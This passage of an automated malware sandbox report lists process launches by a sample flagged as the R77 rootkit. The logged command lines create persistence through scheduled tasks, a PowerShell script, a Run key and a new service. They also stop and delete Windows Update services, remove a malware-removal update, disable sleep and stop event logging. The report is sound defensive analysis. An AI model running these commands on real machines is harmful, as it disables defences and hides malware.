                                                                  Wow64 process (32bit):false
                                                                  Commandline:"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:03:58:04
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                  Imagebase:0x7ff679ad0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff679ad0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff679ad0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\wusa.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                  Imagebase:0x7ff61f8e0000
                                                                  File size:345'088 bytes
                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:03:58:06
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop UsoSvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop WaaSMedicSvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powercfg /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powercfg /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop wuauserv
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop bits
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:03:58:07
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc stop dosvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:41
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:42
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                  Imagebase:0x7ff7e9980000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:46
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:47
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:48
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                  Imagebase:0x7ff68dd40000
                                                                  File size:96'256 bytes
                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:49
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:50
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:51
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\dialer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\dialer.exe
                                                                  Imagebase:0x7ff7f0120000
                                                                  File size:39'936 bytes
                                                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:52
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:53
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe delete "WAGDKRVZ"
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:54
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:55
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                  Imagebase:0x7ff7e9980000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:56
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:57
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:58
                                                                  Start time:03:58:08
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                  Imagebase:0x7ff7e9980000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:59
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                  Imagebase:0x7ff7e9980000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:60
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\winlogon.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:winlogon.exe
                                                                  Imagebase:0x7ff7cd660000
                                                                  File size:906'240 bytes
                                                                  MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  Target ID:61
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:62
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\reg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                  Imagebase:0x7ff7e9980000
                                                                  File size:77'312 bytes
                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:63
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\sc.exe start "WAGDKRVZ"
                                                                  Imagebase:0x7ff784da0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_R77RootKit, Description: Yara detected R77 RootKit, Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  Has exited:true

                                                                  Target ID:64
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:65
                                                                  Start time:03:58:09
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:66
                                                                  Start time:03:58:09
